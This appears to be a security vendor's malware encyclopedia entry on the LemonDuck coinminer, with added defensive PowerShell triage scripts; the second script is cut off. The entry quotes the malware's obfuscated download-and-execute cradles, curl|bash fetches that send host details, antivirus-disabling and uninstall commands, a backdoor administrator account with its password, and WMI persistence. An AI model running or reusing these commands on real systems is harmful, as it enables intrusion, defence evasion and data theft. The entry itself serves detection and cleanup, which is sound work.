Fileless.LEMONDUCK
Trojan-Dropper.PowerShell.Compressed.b (KASPERSKY); Trojan.PowerShell.Crypt (IKARUS)
Windows, Linux
Grayware type: Coinminer
Destructive: No
Encrypted: No
In the wild: Yes
Overview
It arrives as a spammed e-mail attachment distributed by other malware/grayware/spyware or malicious users.
It exploits software vulnerabilities to propagate to other machines across a network.
It then executes the downloaded files. As a result, the malicious routines of the downloaded files are exhibited on the affected system.
It gathers certain information on the affected computer.
Technical Details
Arrival Details
It arrives as an attachment to e-mail messages spammed by other malware/grayware/spyware or malicious users:
- Where Email Subject - Message Body can be any of the following combinations:
- The Truth of COVID-19 - Virus actually comes from United States of America
- COVID-19 nCov Special info WHO - very important infomation for Covid-19 see attached document for your action and discretion.
- HALTH ADVISORY:CORONA VIRUS - the outbreak of CORONA VIRUS is cause of concern especially where forign personal have recently arrived or will be arriving at various intt in near future. see attached document for your action and discretion.
- WTF - what's wrong with you?are you out of your mind!!!!!
- What the fcuk - are you out of your mind!!!!!what 's wrong with you?
- good bye - good bye, keep in touch
- farewell letter - good bye, keep in touch
- broken file - can you help me to fix the file,i can't read it
- This is your order? - file is brokened, i can't open it
Installation
It drops the following files:
- {Removable/Network Drive name}\Dblue3.lnk
- {Removable/Network Drive name}\Eblue3.lnk
- {Removable/Network Drive name}\Fblue3.lnk
- {Removable/Network Drive name}\Gblue3.lnk
- {Removable/Network Drive name}\Hblue3.lnk
- {Removable/Network Drive name}\Iblue3.lnk
- {Removable/Network Drive name}\Jblue3.lnk
- {Removable/Network Drive name}\Kblue3.lnk
- {Removable/Network Drive name}\Dblue6.lnk
- {Removable/Network Drive name}\Eblue6.lnk
- {Removable/Network Drive name}\Fblue6.lnk
- {Removable/Network Drive name}\Gblue6.lnk
- {Removable/Network Drive name}\Hblue6.lnk
- {Removable/Network Drive name}\Iblue6.lnk
- {Removable/Network Drive name}\Jblue6.lnk
- {Removable/Network Drive name}\Kblue6.lnk
- {Removable/Network Drive name}\readme.js
- {Removable/Network Drive name}\UTFsync\inf_data - serves as infection marker
- Some LemonDuck variants deployed via the ProxyLogon vulnerability can drop the following files:
- %System%\inetpub\wwwroot\aspnet_client\js\demo\wanlin.txt
- %System%\inetpub\wwwroot\aspnet_client\js\demo\wanlins.aspx - Chopper Webshell
(Note: %System% is the Windows system folder, which is usually C:\Windows\System on Windows 98 and ME, C:\WINNT\System32 on Windows NT and 2000, and C:\Windows\System32 on Windows 2000(32-bit), XP, Server 2003(32-bit), Vista, 7, 8, 8.1, 2008(64-bit), 2012(64-bit) and 10(64-bit).)
It drops and executes the following files:
- %User Temp%\tt.vbs - installs a scheduled task to execute kk4kk.log (detected as HackTool.Win32.Mpacket.SM)
- %System%\WindowsPowerShell\v1.0\{Random}.exe - legitimate copy of Powershell.exe
(Note: %User Temp% is the current user's Temp folder, which is usually C:\Documents and Settings\{user name}\Local Settings\Temp on Windows 2000(32-bit), XP and Server 2003(32-bit), and C:\Users\{user name}\AppData\Local\Temp on Windows Vista, 7, 8, 8.1, 2008(64-bit), 2012(64-bit) and 10(64-bit).)
It adds the following processes:
- cmd /c start /b notepad "+{Malware file name}+" & powershell -w hidden IE`x(Ne`w-Obj`ect Net.WebC`lient).DownLoadString('{Download URL}7p.php?0.7*mail_js*%username%*%computername%*'+[Environment]::OSVersion.version.Major);bpu ('{Download URL}mail.jsp?js_0.7')"
- cmd /c echo Set-MpPreference -DisableRealtimeMonitoring 1;Add-MpPreference -ExclusionPath c:\;Add-MpPreference -ExclusionProcess %System%\WindowsPowerShell\v1.0\powershell.exe|powershell -w hidden
- ComputerDefaults.exe - if run on Windows 10
- CompMgmtLauncher.exe - if run on any other OS
- To uninstall antivirus-related programs:
- cmd /c start /b wmic.exe product where "name like '%Eset%'" call uninstall /nointeractive
- cmd /c start /b wmic.exe product where "name like '%%Kaspersky%%'" call uninstall /nointeractive
- cmd /c start /b wmic.exe product where "name like '%avast%'" call uninstall /nointeractive
- cmd /c start /b wmic.exe product where "name like '%avp%'" call uninstall /nointeractive
- cmd /c start /b wmic.exe product where "name like '%Security%'" call uninstall /nointeractive
- cmd /c start /b wmic.exe product where "name like '%AntiVirus%'" call uninstall /nointeractive
- cmd /c start /b wmic.exe product where "name like '%Norton Security%'" call uninstall /nointeractive
- cmd /c "C:\Progra~1\Malwarebytes\Anti-Malware\unins000.exe" /verysilent /suppressmsgboxes /norestart
- To open ports:
- cmd.exe /c netsh.exe firewall add portopening tcp 65529 SDNSd
- netsh.exe interface portproxy add v4tov4 listenport=65529 connectaddress=1.1.1.1 connectport=53
- netsh advfirewall firewall add rule name="deny445" dir=in protocol=tcp localport=445 action=block
- netsh advfirewall firewall add rule name="deny135" dir=in protocol=tcp localport=135 action=block
- cmd.exe /c echo try{$localKr=$flase;New-Object Threading.Mutex($true,'Global\eLocalKr',[ref]$localKr)}catch{};$ifmd5='9f9075b6db0089161c96cabf65974fa3';$ifp=$env:tmp+'\kr.bin';$down_url='{Download URL}';function gmd5($con){[System.Security.Cryptography.MD5]::Create().ComputeHash($con)^^^|foreach{$s+=$_.ToString('x2')};return $s}if(test-path $ifp){$con_=[System.IO.File]::ReadAllBytes($ifp);$md5_=gmd5 $con_;if($md5_-eq$ifmd5){$noup=1}}if(!$noup){$con=(Ne`w-Obj`ect Net.WebC`lient).downloaddata($down_url+'/kr.bin?^^^&{Computer Name}^^^&{Gathered information}^^^&{MAC Address}');$t=gmd5 $con;if($t-eq$ifmd5){[System.IO.File]::WriteAllBytes($ifp,$con)}else{$noup=1}}if($noup){$con=$con_;$ifmd5=$md5_}I`EX(-join[char[]]$con)|{Random}.exe -
- cmd.exe /c echo try{$localIf=$flase;New-Object Threading.Mutex($true,'Global\eLocalIf',[ref]$localIf)}catch{};$ifmd5='144f3ede7ec9d604a58113fc91a246d1';$ifp=$env:tmp+'\if.bin';$down_url='{Download URL}';function gmd5($con){[System.Security.Cryptography.MD5]::Create().ComputeHash($con)^^^|foreach{$s+=$_.ToString('x2')};return $s}if(test-path $ifp){$con_=[System.IO.File]::ReadAllBytes($ifp);$md5_=gmd5 $con_;if($md5_-eq$ifmd5){$noup=1}}if(!$noup){$con=(Ne`w-Obj`ect Net.WebC`lient).downloaddata($down_url+'/if.bin?^^^&{Computer Name}^^^&{Gathered information}^^^&{MAC Address}');$t=gmd5 $con;if($t-eq$ifmd5){[System.IO.File]::WriteAllBytes($ifp,$con)}else{$noup=1}}if($noup){$con=$con_;$ifmd5=$md5_}I`EX(-join[char[]]$con)|{Random}.exe -
- For 64bit machines:
- cmd.exe /c echo try{$localTMn=$flase;New-Object Threading.Mutex($true,'Global\elocalTMn',[ref]$localKr)}catch{};$ifmd5='4001ba98a424fdb63047a23af97ec590';$ifp=$env:tmp+'\m6.bin';$down_url='{Download URL}';function gmd5($con){[System.Security.Cryptography.MD5]::Create().ComputeHash($con)^^^|foreach{$s+=$_.ToString('x2')};return $s}if(test-path $ifp){$con_=[System.IO.File]::ReadAllBytes($ifp);$md5_=gmd5 $con_;if($md5_-eq$ifmd5){$noup=1}}if(!$noup){$con=(Ne`w-Obj`ect Net.WebC`lient).downloaddata($down_url+'/m6.bin?^^^&{Computer Name}^^^&{Gathered information}^^^&{MAC Address}');$t=gmd5 $con;if($t-eq$ifmd5){[System.IO.File]::WriteAllBytes($ifp,$con)}else{$noup=1}}if($noup){$con=$con_;$ifmd5=$md5_}I`EX(-join[char[]]$con)|{Random}.exe -
- For 64-bit machines whose video card name contains any of the following: {GTX, NVIDIA, GEFORCE, Radeon, AMD}
- cmd.exe /c echo try{$localTMng=$flase;New-Object Threading.Mutex($true,'Global\elocalTMng',[ref]$localKr)}catch{};$ifmd5='a921b532d5d239e4a2e71e5f853195cd';$ifp=$env:tmp+'\m6g.bin';$down_url='{Download URL}';function gmd5($con){[System.Security.Cryptography.MD5]::Create().ComputeHash($con)^^^|foreach{$s+=$_.ToString('x2')};return $s}if(test-path $ifp){$con_=[System.IO.File]::ReadAllBytes($ifp);$md5_=gmd5 $con_;if($md5_-eq$ifmd5){$noup=1}}if(!$noup){$con=(Ne`w-Obj`ect Net.WebC`lient).downloaddata($down_url+'/m6g.bin?^^^&{Computer Name}^^^&{Gathered information}^^^&{MAC Address}');$t=gmd5 $con;if($t-eq$ifmd5){[System.IO.File]::WriteAllBytes($ifp,$con)}else{$noup=1}}if($noup){$con=$con_;$ifmd5=$md5_}I`EX(-join[char[]]$con)|{Random}.exe -
- Some variants of LemonDuck execute the following:
- Add users and local groups:
- net user netcat 'qweqwe$123123' /add
- net localgroup administrators netcat /add
- net localgroup Administrateurs netcat /add
- net localgroup 'Remote Desktop Users' netcat /add
- net localgroup 'Enterprise Admins' netcat /add
- net group 'Enterprise Admins' netcat /add /domain
- powershell.exe -ep bypass -c "Add-PSSnapin Microsoft.Exchange.Management.PowerShell.SnapIn;new-managementroleassignment -role applicationimpersonation -user netcat"
- powershell.exe -ep bypass -c "Add-PSSnapin Microsoft.Exchange.Management.PowerShell.E2010;new-managementroleassignment -role applicationimpersonation -user netcat"
- powershell.exe -ep bypass -c "Add-PSSnapin Microsoft.Exchange.Management.PowerShell.Admin;new-managementroleassignment -role applicationimpersonation -user netcat"
- Delete AV-related firewall rules:
- cmd /c netsh advfirewall set allprofiles state off
- cmd /c netsh advfirewall firewall delete rule LiveUpdate360
- cmd /c netsh advfirewall firewall delete rule 360LeakFixer.exe
- cmd /c netsh advfirewall firewall delete rule 360bdoctor.exe
- cmd /c netsh advfirewall firewall delete rule 360netcfg.exe
- cmd /c netsh advfirewall firewall delete rule 360Seclogon
- cmd /c netsh advfirewall firewall delete rule 360rp.exe
- cmd /c netsh advfirewall firewall delete rule 360rps.exe
- cmd /c netsh advfirewall firewall delete rule 360safe.exe
- cmd /c netsh advfirewall firewall delete rule 360safe_cq.exe
- cmd /c netsh advfirewall firewall delete rule 360EvtMgr.exe
- cmd /c netsh advfirewall firewall delete rule 360se.exe
- cmd /c netsh advfirewall firewall delete rule 360sdUpd.exe
- cmd /c netsh advfirewall firewall delete rule 360sd.exe
- cmd /c netsh advfirewall firewall delete rule 360speedld.exe
- cmd /c netsh advfirewall firewall delete rule 360Tray.exe
- Delete AV-related services:
- "Sophos System Protection Service"
- "Sophos AutoUpdate Service"
- "Sophos Endpoint Defense Service"
- SAVService
- SAVAdminService
- SavexSrvc
- PMContExtrSvc
- MMRot
- PMScanner
- PMEVizsla
- SavexWebAgent
- swi_filter
- swi_service
- MBAMService
- powershell.exe -psconsolefile "$env:exchangeinstallpath\bin\exshell.psc1" -command "New-ManagementRoleAssignment –Role 'Mailbox Import Export' –User netcat"
- REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
- wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1
It creates the following folders:
- Variants of LemonDuck deployed via the ProxyLogon vulnerability can create the following folders:
- %System%\inetpub\wwwroot\aspnet_client\js\demo
- {Exchange server installation path}\Frontend\HttpProxy\ecp\auth\js\demo
Other System Modifications
It modifies the following registry entries:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters
DisableCompression = 1
HKEY_CURRENT_USER\Software\Classes\ms-settings\shell\open\command
DelegateExecute = {Null}
HKEY_CURRENT_USER\Software\Classes\ms-settings\shell\open\command
(default) = cmd /c echo Set-MpPreference -DisableRealtimeMonitoring 1;Add-MpPreference -ExclusionPath c:\;Add-MpPreference -ExclusionProcess %System%\WindowsPowerShell\v1.0\powershell.exe|powershell -w hidden & Iex(new-object net.webclient).downloadstring('"+{Download URL}+"?$env:username*$env:computername*$ver')
HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command
DelegateExecute = {Null}
HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command
(default) = cmd /c powershell -w hidden Iex(new-object net.webclient).downloadstring('"+{Download URL}+"?$env:username*$env:computername*$ver')
Propagation
It exploits the following software vulnerabilities to propagate to other machines across a network:
- SMB request - Eternal Blue Exploit (CVE-2017-0144)
- Upon exploitation, it may perform the following:
- Execute the following command: cmd /c schtasks /create /ru system /sc MINUTE /mo 120 /tn Rtsa /tr "powershell -c '\\"{Download URL 1}\\",\\"{Download URL 2}\\",\\"{Download URL 2}\\"|foreach{I`EX(Ne`w-Obj`ect Net.WebC`lient).\\"DownloadString\\"(\\"http://$_/ebo.jsp?0.9*$env:username*$env:computername\\")}'" /F & echo %path%|findstr /i powershell>nul || (setx path "%path%;c:\windows\system32\WindowsPowershell\v1.0" /m) & schtasks /run /tn Rtsa
- Install the following scheduled task:
Task Name: Rtsa
Task Action: \"{Download URL 1}\",\"{Download URL 2}\",\"{Download URL 2}\"|foreach{I`EX(Ne`w-Obj`ect Net.WebC`lient).\"DownloadString\"(\"http://$_/ebo.jsp?0.9*$env:username*$env:computername\")}"
- Upon exploitation, it may perform the following:
- Upon exploitation, it executes the following command:
- cmd /c powershell Set-MpPreference -DisableRealtimeMonitoring 1;Add-MpPreference -ExclusionProcess c:/windows/system32/WindowsPowerShell/v1.0/powershell.exe;Add-MpPreference -ExclusionPath c:/ & powershell IEx(New-Object Net.WebClient).DownLoadString(''{Download URL}/smgh.jsp?0.9*%computername%'')
- cmd /c powershell Set-MpPreference -DisableRealtimeMonitoring 1;Add-MpPreference -ExclusionProcess c:/windows/system32/WindowsPowerShell/v1.0/powershell.exe;Add-MpPreference -ExclusionPath c:/ & powershell IEx(New-Object Net.WebClient).DownLoadString(''{Download URL}/smgho.jsp?0.9*%computername%'')
- Upon exploitation, it may execute the following:
- %System%\cmd.exe /c echo y|{Executable Path} {Username}@{IP Address} -pw {Password} -v "src=ssh;(curl -fsSL {Download URL}/ln/core.png?0.9*ssh*`whoami`*`hostname`||wget -q -O- {Download URL}/ln/core.png?0.9*ssh*`whoami`*`hostname`)|bash"
- %System%\cmd.exe /c echo y|{Executable Path} {Username}@{IP Address} -pw {Password} -v "src=ssho;(curl -fsSL {Download URL}/ln/core.png?0.9*ssho*`whoami`*`hostname`||wget -q -O- {Download URL}/ln/core.png?0.9*ssho*`whoami`*`hostname`)|bash"
- It uses the PowerDump module and Mimikatz to dump the username, password, NTLM hashes, and domain information of the target machine.
- Upon successful brute-forcing, it adds a malware detected as HackTool.Win32.EvilCLR.YXBCIA to the database server to enable the execution of the following: "powershell.exe iex(new-object net.webclient).downloadstring('{Download URL}/if.bin?once')"
- It scans for a vulnerable MS-SQL port 1433. Upon exploitation, it executes the following commands:
- cmd /c powershell IE`x(Ne`w-Obj`ect Net.WebC`lient).DownLoadString(''{Download URL}/ms.jsp?0.9*%computername%'')
- cmd /c powershell IE`x(Ne`w-Obj`ect Net.WebC`lient).DownLoadString(''{Download URL}/mso.jsp?0.9*%computername%'')
- Upon scanning for vulnerable ports 6379 and 16379, it may execute the following commands:
- export src=rds;curl -fsSL {Download URL}/ln/core.png?rds|bash
- export src=rdso;curl -fsSL {Download URL}/ln/core.png?rdso|bash
- Upon scanning for vulnerable port 8088, it may execute the following commands:
- export src=yarn;curl -fsSL {Download URL}/ln/core.png?yarn|bash
- export src=yarno;curl -fsSL {Download URL}/ln/core.png?yarno|bash
- Upon scanning for vulnerable port 7001, it may execute the following commands:
- cmd /c powershell Set-MpPreference -DisableRealtimeMonitoring 1;Add-MpPreference -ExclusionProcess %System%\WindowsPowerShell\v1.0\powershell.exe;Add-MpPreference -ExclusionPath c:\ & powershell IEx(New-Object Net.WebClient).DownLoadString(''{Download URL}/logic.jsp?0.9*%computername%'')
- export src=logic;curl -fsSL {Download URL}/ln/core.png?logic|bash
- cmd /c powershell Set-MpPreference -DisableRealtimeMonitoring 1;Add-MpPreference -ExclusionProcess %System%\WindowsPowerShell\v1.0\powershell.exe;Add-MpPreference -ExclusionPath c:\ & powershell IEx(New-Object Net.WebClient).DownLoadString(''{Download URL}/logico.jsp?0.9*%computername%'')
- export src=logico;curl -fsSL {Download URL}/ln/core.png?logico|bash
- Upon exploiting vulnerable networks connecting to port 445, it does the following:
- Execute the following:
- cmd /c powershell Set-MpPreference -DisableRealtimeMonitoring 1;Add-MpPreference -ExclusionPath c:\;Add-MpPreference -ExclusionProcess %System%\WindowsPowerShell\v1.0\powershell.exe & powershell -w hidden IE`x(Ne`w-Obj`ect Net.WebC`lient).DownLoadString(''{Download URL}/7p.php?0.9*ipc*%username%*%computername%*''+[Environment]::OSVersion.version.Major);bpu (''{Download URL}/ipc.jsp?0.9'')
- cmd /c powershell Set-MpPreference -DisableRealtimeMonitoring 1;Add-MpPreference -ExclusionPath c:\;Add-MpPreference -ExclusionProcess %System%\WindowsPowerShell\v1.0\powershell.exe & powershell -w hidden IE`x(Ne`w-Obj`ect Net.WebC`lient).DownLoadString(''{Download URL}/7p.php?0.9*ipco*%username%*%computername%*''+[Environment]::OSVersion.version.Major);bpu (''{Download URL}/ipco.jsp?0.9'')
- Drop the following file:
- \{IP address}\%User Startup%\run.bat - download LemonDuck module
(Note: %User Startup% is the current user's Startup folder, which is usually C:\Windows\Profiles\{user name}\Start Menu\Programs\Startup on Windows 98 and ME, C:\WINNT\Profiles\{user name}\Start Menu\Programs\Startup on Windows NT, C:\Documents and Settings\{user name}\Start Menu\Programs\Startup on Windows 2003(32-bit), XP and 2000(32-bit), and C:\Users\{user name}\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup on Windows Vista, 7, 8, 8.1, 2008(64-bit), 2012(64-bit) and 10(64-bit).)
Process Termination
It terminates the following services if found on the affected system:
- .Net CLR
- \gm
- 360rTys
- ALGM
- aspnet_staters
- AxInstSV
- ClipBooks
- CLR
- clr_optimization
- DNS Server
- ExpressVNService
- IPSECS
- lsass
- Microsoft
- Microsoft Telemetry
- MpeSvc
- mssecsvc2.0
- mssecsvc2.1
- Natimmonal
- Nationaaal
- National
- Nationalaie
- Nationalmll
- Nationaloll
- Nationalwpi
- NetMsmqActiv Media NVIDIA
- Oracleupdate
- RpcEptManger
- Samserver
- Serhiez
- Sncryption Media Playeq
- Sougoudl
- SRDSL
- SuperProServer
- SvcNlauser
- SVSHost
- SxS
- sysmgt
- system
- taskmgr1
- WebServers
- WifiService
- Windows Managers
- Windows_Update
- WinHasdadelp32
- WinHasdelp32
- WinHelp32
- WinHelp64
- WinHelpSvcs
- WinSvc
- WinVaultSvc
- WissssssnHelp32
- WmdnPnSN
- wmiApServs
- wmiApSrvs
- WWW.{BLOCKED}S.CN.COM
- Xtfy
- Xtfya
- Xtfyxxx
- xWinWpdSrv
- Zational
It terminates processes or services that contain any of the following strings if found running in the affected system's memory:
- 360
- 8866
- 9696
- 9797
- 9966
- auto-upgeade
- Avira
- Calligrap
- cara
- Carbon
- carss
- cohernece
- conhoste
- csrsc
- DW20
- explores
- Galligrp
- gxdrv
- Imaging
- javaupd
- lsmosee
- minerd
- MinerGate
- msinfo
- ress
- SC
- SearchIndex
- secuams
- service
- Setring
- Setting
- Sqlceqp
- SQLEXPRESS_X64_86
- SQLforwin
- svchosti
- svshost
- SystemIIS
- SystemIISSec
- taskegr
- taskmgr1
- Terms.EXE
- Uninsta
- update
- upgeade
- WerFault
- WerMgr
- win
- WindowsDefender*
- WindowsUpdater*
- Workstation
- xig*
- XMR*
- xmrig*
- yamm1
- 360bdoctor.exe
- 360rp.exe
- 360rps.exe
- 360safe_cq.exe
- 360safe_se.exe
- 360sd.exe
- 360speedld.exe
- 360Tray.exe
- 360LogCenter.exe
- 360tray.exe
- 360speedld.exe
- 360se.exe
Dropping Routine
It exploits the following software vulnerabilities to drop malicious files:
- Windows LNK Remote Code Execution Vulnerability (CVE-2017-8464) - Dropped in removable drives to allow execution of remote commands.
Download Routine
It saves the downloaded files under the following names:
- %User Temp%\m6.bin - Modified XMRig for 64-bit machines
- %User Temp%\m6g.bin - Coinminer for 64-bit machines whose video card name contains one of the following strings: "GTX", "NVIDIA", "GEFORCE", "Radeon", "AMD"
- %User Temp%\kr.bin - Kill Competitions Module
- %User Temp%\if.bin - Propagation and Exploitation Module
- %User Temp%\if_mail.bin - Email Spreader Module
- %User Temp%\ode.bin - Downloads PowerSploit module and create scheduled task
- %User Temp%\nvd.zip - Coinminer for 64-bit machines whose video card name contains one of the following strings: "GTX", "NVIDIA", "GEFORCE", "Radeon", "AMD"
- %User Temp%\mimi.dat - Mimikatz module
- Modules for Process Termination, Task and WMI installation:
- %User Temp%\mso.jsp
- %User Temp%\ms.jsp
- %User Temp%\rdp.jsp
- %User Temp%\rdpo.jsp
- %User Temp%\smgh.jsp
- %User Temp%\smgho.jsp
- %User Temp%\logic.jsp
- %User Temp%\logico.jsp
It then executes the downloaded files. As a result, the malicious routines of the downloaded files are exhibited on the affected system.
Information Theft
It gathers the following information on the affected computer:
- Machine Type (32bit or 64bit)
- Computer Name
- Product UUID
- Mac Address
- Operating system
- User name
- Machine Domain
- System uptime
- Video Controller name
- Physical memory
- Drive information:
- Drive Type
- Free space
- Drive format
- Time stamp
- JavaScript information on localhost
- Host Name
- Coinminer version - if a coinminer is present
- Ip address - if a coinminer is present
- Total hashrate - if a coinminer is present
- First 6 bytes of md5 hashes of malicious files
Other Details
It does the following:
- It adds the following Windows Management Instrumentation (WMI) entries under ROOT\subscription:
- Infection Marker:
- __EventFilter
- Name: blackball
- Persistence:
- __EventFilter
- Name: {Random}
- CommandLineEventConsumer
- Name: {Random}
- Command: powershell -w hidden -c function a($u){$d=(Ne`w-Obj`ect Net.WebC`lient)."DownloadData"($u);$c=$d.count;if($c -gt 173){$b=$d[173..$c];$p=New-Object Security.Cryptography.RSAParameters;$p.Modulus=[convert]::FromBase64String('{Base64 encoded command}');$p.Exponent=0x01,0x00,0x01;$r=New-Object Security.Cryptography.RSACryptoServiceProvider;$r.ImportParameters($p);if($r.verifyData($b,(New-Object Security.Cryptography.SHA1CryptoServiceProvider),[convert]::FromBase64String(-join([char[]]$d[0..171])))){I`ex(-join[char[]]$b)}}}$url='{Download URL}';a($url+'/a.jsp?mail_20210428?'+(@($env:COMPUTERNAME,$env:USERNAME,(get-wmiobject Win32_ComputerSystemProduct).UUID,(random))-join'*'))
- __FilterToConsumerBinding
- It disables Windows Defender real-time monitoring and excludes the C:\ directory and PowerShell.exe from Windows Defender scans.
- It only modifies "HKEY_CURRENT_USER\Software\Classes\ms-settings\shell\open\command" if the OS is Windows 10. Otherwise, the registry key "HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command" is modified.
- It deletes the following scheduled tasks:
- /Rtsa
- /Rtsa1
- /Rtsa2
- AdobeFlashPlayer
- Bluetooths
- Credentials
- Ddrivers
- DNS
- DnsCore
- DnsCore
- DnsScan
- ECDnsCore
- Flash
- FlashPlayer1
- FlashPlayer2
- FlashPlayer3
- gm
- GooglePingConfigs
- HispDemorn
- HomeGroupProvider
- IIS
- LimeRAT-Admin
- Microsoft Telemetry
- Miscfost
- MiscfostNsi
- my1
- Mysa
- Mysa1
- Mysa2
- Mysa3
- Netframework
- ngm
- ok
- Oracle Java
- Oracle Java Update
- Oracle Products Reporter
- RavTask
- skycmd
- Sorry
- Spooler SubSystem Service
- System Log Security Check
- SYSTEM"qPt,"DNS2
- SYSTEMa
- TablteInputout
- Update
- Update qPtservice for Windows Service
- Update service for products
- Update_windows
- Update1
- Update2
- Update3
- Update4
- WebServers
- werclpsyport
- Windows_Update
- WindowsLogTasks
- WindowsUpdate1
- WindowsUpdate2
- WindowsUpdate3
- WwANsvc
- It checks for the presence of Outlook and Outlook\Security in the following registry keys:
- HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office
- HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Office
- HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\Office
- HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Office
If present, it modifies the registry entry:
{Registry Key from list above}
ObjectModelGuard = 2
- It uses any of the following {Download URL}s to send gathered information and to download related modules:
- It sets the machine's DNS server to a public resolver (8.8.8.8 or 9.9.9.9).
- It uses the following credentials for brute-forcing:
- Username:
- administrator
- admin
- Passwords: a wordlist of common weak passwords
- NTLM Hashes: a list of NTLM password hashes
- It sends copies of itself as a ZIP attachment to email addresses gathered from the victim machine's Outlook contacts, inbox and sent items. It then deletes the emails it sent from the Sent Items folder.
- It tries to connect to the named pipe \.\pipe\HHyeuqi7\ and execute its email propagation module.
- It terminates processes connecting to the following domains:
- pg.{BLOCKED}q.com
- p.{BLOCKED}q.com
- pg.{BLOCKED}4.com
- p.{BLOCKED}4.com
- lplp.{BLOCKED}g.com
- It terminates processes that established a TCP connection to the following ports:
- 1111
- 2222
- 3333
- 4444
- 5555
- 6666
- 7777
- 8888
- 9999
- 14433
- 14444
- 43669
- 43668
- 45560
- 65333
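The port list above is what the miner uses to spot competing miners, but it is equally useful to a responder: any process on the host holding an established connection to one of these ports deserves a look. The script below is an added triage example, not Trend Micro's tooling or the malware's own code. It lists such connections, resolves the owning process, hashes its image and compares the MD5 against the hash list given earlier on this page (three values copied here; extend `$IocMd5` with the full list). It assumes a Windows host with the `NetTCPIP` module (Windows 8 / Server 2012 or later) and an elevated session.

```powershell
# Added triage example (not Trend Micro's tooling). Run elevated on the Windows
# host under investigation; Get-NetTCPConnection is not available on Linux.

# Ports named in the write-up (the miner kills processes connected to them).
$SuspectPorts = 1111,2222,3333,4444,5555,6666,7777,8888,9999,
                14433,14444,43669,43668,45560,65333

# MD5 values copied from the hash list on this page; extend with the full list.
$IocMd5 = @(
    '527C9C819B286EFB8EC4EBB5B5AE71CF',
    '5377E40CD4426B4CB1E3A42FB406A6AE',
    'FE59C71A6DB2AF3B108D27BEE8B0AA50'
)

function Get-SuspectConnection {
    [CmdletBinding()]
    param(
        [int[]]$Ports = $SuspectPorts,
        [string[]]$KnownHashes = $IocMd5
    )

    Get-NetTCPConnection -State Established -ErrorAction SilentlyContinue |
        Where-Object { $Ports -contains $_.RemotePort } |
        ForEach-Object {
            $conn = $_
            $proc = Get-Process -Id $conn.OwningProcess -ErrorAction SilentlyContinue
            $name = '<exited>'; $path = $null; $md5 = $null
            if ($proc) {
                $name = $proc.ProcessName
                $path = $proc.Path          # $null for protected processes
                if ($path -and (Test-Path -LiteralPath $path)) {
                    $md5 = (Get-FileHash -LiteralPath $path -Algorithm MD5).Hash
                }
            }
            [pscustomobject]@{
                ProcessId  = $conn.OwningProcess
                Process    = $name
                ImagePath  = $path
                RemoteAddr = $conn.RemoteAddress
                RemotePort = $conn.RemotePort
                Md5        = $md5
                # -contains is case-insensitive, so hash case does not matter.
                KnownIoc   = [bool]($md5 -and ($KnownHashes -contains $md5))
            }
        }
}

# Usage: report first; stop processes only after reviewing ImagePath/KnownIoc.
$hits = Get-SuspectConnection
if ($hits) { $hits | Format-Table -AutoSize }
else       { Write-Host 'No established connections to the listed ports.' }
```

A connection to one of these ports is a lead, not proof: legitimate software occasionally uses them, and a match is only conclusive when `KnownIoc` is true or the image path points into `%User Temp%` or another location from the file list in Step 6.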
Solutions
Step 1
For Windows ME and XP users: before scanning, make sure System Restore is disabled so that the entire computer can be scanned.
Step 2
Note that not all files, folders, registry keys and entries are necessarily installed on your computer while this malware/spyware/grayware is running. This may be due to an incomplete installation or other operating system conditions. Proceed to the next step.
Step 3
Restart in Safe Mode
Step 4
Restore this modified registry value
Important: Editing the Windows Registry incorrectly can lead to irreversible system malfunction. Please do this only if you know how to or you can seek your system administrator’s help. You may also check out this Microsoft article first before modifying your computer's registry.
- In HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters
- DisableCompression = 1
- DisableCompression = {Default}
- In HKEY_CURRENT_USER\Software\Classes\ms-settings\shell\open\command
- DelegateExecute = {Null}
- DelegateExecute = {Default}
- In HKEY_CURRENT_USER\Software\Classes\ms-settings\shell\open\command
- (default) = cmd /c echo Set-MpPreference -DisableRealtimeMonitoring 1;Add-MpPreference -ExclusionPath c:\;Add-MpPreference -ExclusionProcess %System%\WindowsPowerShell\v1.0\powershell.exe|powershell -w hidden & Iex(new-object net.webclient).downloadstring('"+{Download URL}+"?$env:username*$env:computername*$ver')
- (default) = {Default}
- In HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command
- DelegateExecute = {Null}
- DelegateExecute = {Default}
- In HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command
- (default) = cmd /c powershell -w hidden Iex(new-object net.webclient).downloadstring('"+{Download URL}+"?$env:username*$env:computername*$ver')
- (default) = {Default}
- {Registry Key in Outlook\Security in the list mentioned}
- ObjectModelGuard = 2
- ObjectModelGuard = {Default}
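The values in Step 4 cover three different things: the `ms-settings` and `mscfile` command keys under HKCU (which do not exist on a clean profile and, when present with a `DelegateExecute` value, redirect auto-elevating Windows binaries to the attacker's command), the SMB server `DisableCompression` flag, and Outlook's `ObjectModelGuard`, which at `2` silences the programmatic-access prompt the mailer module would otherwise trigger. The script below is an added audit example, not Trend Micro's tooling; it reports each listed modification and, with `-Remediate`, restores the `{Default}` state by removing the hijack keys and the two values. The Outlook key paths are an assumption, since this page only says "Outlook\Security": the common per-user and policy locations are checked.

```powershell
# Added audit example (not Trend Micro's tooling). Run elevated; report-only
# unless -Remediate is given. Requires Windows PowerShell 5.1 or later.
[CmdletBinding()]
param([switch]$Remediate)

$Findings = New-Object System.Collections.Generic.List[object]
function Add-Finding([string]$Key, [string]$Name, $Value, [string]$Expected) {
    $Findings.Add([pscustomobject]@{ Key = $Key; Name = $Name; Value = $Value; Expected = $Expected })
}

# 1. HKCU shell hijack keys. A clean profile has neither key, so the key's
#    existence is itself a finding; the values show what it was pointed at.
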